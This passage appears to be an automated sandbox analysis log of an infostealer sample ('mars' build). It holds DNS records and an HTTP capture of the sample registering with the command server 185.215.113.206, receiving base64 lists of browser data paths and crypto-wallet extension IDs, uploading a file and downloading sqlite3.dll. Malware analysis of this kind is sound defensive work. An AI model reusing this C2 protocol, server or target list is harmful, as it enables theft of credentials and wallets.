Nov 26, 2024 00:25:38.275444031 CET	1.1.1.1	192.168.2.6	0xa22e	No error (0)	sb.scorecardresearch.com		18.165.220.106	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:25:38.275444031 CET	1.1.1.1	192.168.2.6	0xa22e	No error (0)	sb.scorecardresearch.com		18.165.220.66	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:25:38.287491083 CET	1.1.1.1	192.168.2.6	0x45e6	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2024 00:25:38.361577034 CET	1.1.1.1	192.168.2.6	0x78af	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2024 00:25:38.422046900 CET	1.1.1.1	192.168.2.6	0x9bec	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2024 00:25:38.498821020 CET	1.1.1.1	192.168.2.6	0x94a9	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2024 00:25:38.566548109 CET	1.1.1.1	192.168.2.6	0x6707	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2024 00:25:38.567784071 CET	1.1.1.1	192.168.2.6	0x2654	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2024 00:25:40.099248886 CET	1.1.1.1	192.168.2.6	0xf417	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2024 00:25:40.099248886 CET	1.1.1.1	192.168.2.6	0xf417	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:26:12.124634027 CET	1.1.1.1	192.168.2.6	0x4c35	No error (0)	g-bing-com.ax-0001.ax-msedge.net	ax-0001.ax-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2024 00:26:12.124634027 CET	1.1.1.1	192.168.2.6	0x4c35	No error (0)	ax-0001.ax-msedge.net		150.171.27.10	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:26:12.124634027 CET	1.1.1.1	192.168.2.6	0x4c35	No error (0)	ax-0001.ax-msedge.net		150.171.28.10	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:26:36.166522980 CET	1.1.1.1	192.168.2.6	0x59ec	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2024 00:26:36.263075113 CET	1.1.1.1	192.168.2.6	0x6b90	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2024 00:26:47.516287088 CET	1.1.1.1	192.168.2.6	0x8f14	No error (0)	g-bing-com.ax-0001.ax-msedge.net	ax-0001.ax-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2024 00:26:47.516287088 CET	1.1.1.1	192.168.2.6	0x8f14	No error (0)	ax-0001.ax-msedge.net		150.171.28.10	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:26:47.516287088 CET	1.1.1.1	192.168.2.6	0x8f14	No error (0)	ax-0001.ax-msedge.net		150.171.27.10	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49715	185.215.113.206	80	4592	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 26, 2024 00:25:12.153649092 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 26, 2024 00:25:13.529400110 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 26, 2024 00:25:13.533041000 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAK Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 41 41 36 45 42 43 30 30 43 33 31 32 39 31 33 31 31 31 33 31 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 2d 2d 0d 0a Data Ascii: ------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="hwid"37AA6EBC00C31291311131------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="build"mars------GDAAKFIDGIEGDGDHIDAK--
Nov 26, 2024 00:25:13.994708061 CET	407	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:13 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4e 44 59 33 4e 57 55 77 4e 54 67 79 4e 6a 6c 6d 59 7a 51 33 4e 54 41 77 4e 44 4d 32 4f 44 6b 32 4d 57 52 6c 5a 6d 59 35 59 7a 59 30 4f 54 55 30 4e 32 59 35 4e 44 63 31 4e 44 46 6a 4d 7a 63 35 5a 6a 52 69 59 6a 4a 69 59 32 46 68 4e 57 49 78 4d 44 67 7a 4e 54 51 35 4d 7a 6b 77 5a 54 52 6d 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: NDY3NWUwNTgyNjlmYzQ3NTAwNDM2ODk2MWRlZmY5YzY0OTU0N2Y5NDc1NDFjMzc5ZjRiYjJiY2FhNWIxMDgzNTQ5MzkwZTRmfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Nov 26, 2024 00:25:13.996191025 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAFBFCBGHDGCFHJJECAF Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 37 35 65 30 35 38 32 36 39 66 63 34 37 35 30 30 34 33 36 38 39 36 31 64 65 66 66 39 63 36 34 39 35 34 37 66 39 34 37 35 34 31 63 33 37 39 66 34 62 62 32 62 63 61 61 35 62 31 30 38 33 35 34 39 33 39 30 65 34 66 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 2d 2d 0d 0a Data Ascii: ------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="token"4675e058269fc475004368961deff9c649547f947541c379f4bb2bcaa5b1083549390e4f------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="message"browsers------BAFBFCBGHDGCFHJJECAF--
Nov 26, 2024 00:25:14.444504976 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:14 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2028 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
Nov 26, 2024 00:25:14.444614887 CET	1020	IN	Data Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45 Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
Nov 26, 2024 00:25:14.445828915 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGIJKJJKEBGHJKFIDGCA Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 37 35 65 30 35 38 32 36 39 66 63 34 37 35 30 30 34 33 36 38 39 36 31 64 65 66 66 39 63 36 34 39 35 34 37 66 39 34 37 35 34 31 63 33 37 39 66 34 62 62 32 62 63 61 61 35 62 31 30 38 33 35 34 39 33 39 30 65 34 66 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 2d 2d 0d 0a Data Ascii: ------CGIJKJJKEBGHJKFIDGCAContent-Disposition: form-data; name="token"4675e058269fc475004368961deff9c649547f947541c379f4bb2bcaa5b1083549390e4f------CGIJKJJKEBGHJKFIDGCAContent-Disposition: form-data; name="message"plugins------CGIJKJJKEBGHJKFIDGCA--
Nov 26, 2024 00:25:14.896066904 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:14 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Nov 26, 2024 00:25:14.896095991 CET	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Nov 26, 2024 00:25:14.896110058 CET	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Nov 26, 2024 00:25:14.896233082 CET	1236	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Nov 26, 2024 00:25:14.896245956 CET	1236	IN	Data Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
Nov 26, 2024 00:25:14.896260023 CET	1164	IN	Data Raw: 56 32 46 73 62 47 56 30 66 47 68 6c 5a 57 5a 76 61 47 46 6d 5a 6d 39 74 61 32 74 72 63 47 68 75 62 48 42 76 61 47 64 73 62 6d 64 74 59 6d 4e 6a 62 47 68 70 66 44 46 38 4d 48 77 77 66 46 68 32 5a 58 4a 7a 5a 53 42 58 59 57 78 73 5a 58 52 38 61 57 Data Ascii: V2FsbGV0fGhlZWZvaGFmZm9ta2trcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGp
Nov 26, 2024 00:25:14.898262978 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFIJKEBFBFHIJJKEHDHI Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 46 49 4a 4b 45 42 46 42 46 48 49 4a 4a 4b 45 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 37 35 65 30 35 38 32 36 39 66 63 34 37 35 30 30 34 33 36 38 39 36 31 64 65 66 66 39 63 36 34 39 35 34 37 66 39 34 37 35 34 31 63 33 37 39 66 34 62 62 32 62 63 61 61 35 62 31 30 38 33 35 34 39 33 39 30 65 34 66 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 4b 45 42 46 42 46 48 49 4a 4a 4b 45 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 4b 45 42 46 42 46 48 49 4a 4a 4b 45 48 44 48 49 2d 2d 0d 0a Data Ascii: ------BFIJKEBFBFHIJJKEHDHIContent-Disposition: form-data; name="token"4675e058269fc475004368961deff9c649547f947541c379f4bb2bcaa5b1083549390e4f------BFIJKEBFBFHIJJKEHDHIContent-Disposition: form-data; name="message"fplugins------BFIJKEBFBFHIJJKEHDHI--
Nov 26, 2024 00:25:15.347980022 CET	335	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:15 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Nov 26, 2024 00:25:15.386125088 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBGIEGCFHCFHIDHIJECA Host: 185.215.113.206 Content-Length: 6315 Connection: Keep-Alive Cache-Control: no-cache
Nov 26, 2024 00:25:15.386251926 CET	6315	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 37 35 65 30 Data Ascii: ------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="token"4675e058269fc475004368961deff9c649547f947541c379f4bb2bcaa5b1083549390e4f------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Nov 26, 2024 00:25:16.356446028 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 26, 2024 00:25:16.638652086 CET	94	OUT	GET /68b591d6548ec281/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 26, 2024 00:25:17.086791992 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:16 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 